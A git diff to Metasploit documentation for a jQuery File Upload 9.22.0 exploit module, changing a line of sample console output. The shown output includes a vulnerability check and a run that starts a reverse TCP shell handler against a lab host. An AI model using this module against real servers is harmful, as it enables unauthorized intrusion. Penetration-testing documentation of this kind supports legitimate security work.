diff --git a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md index b2cff6a0a8..398027f9b0 100644 --- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md +++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md @@ -39,14 +39,14 @@ You may want to use another tool like `dirb` to handle enumeration. msf5 exploit(unix/webapp/jquery_file_upload) > check [*] Checking /jQuery-File-Upload/package.json -[+] Found Apache 2.4.18 (AllowOverride None) +[+] Found Apache 2.4.18 (AllowOverride None may be set) [+] Found unpatched jQuery File Upload 9.22.0 [*] 172.28.128.3:80 The target appears to be vulnerable. msf5 exploit(unix/webapp/jquery_file_upload) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Checking /jQuery-File-Upload/package.json -[+] Found Apache 2.4.18 (AllowOverride None) +[+] Found Apache 2.4.18 (AllowOverride None may be set) [+] Found unpatched jQuery File Upload 9.22.0 [*] Checking /jQuery-File-Upload/server/php/index.php [+] Found /jQuery-File-Upload/server/php/index.php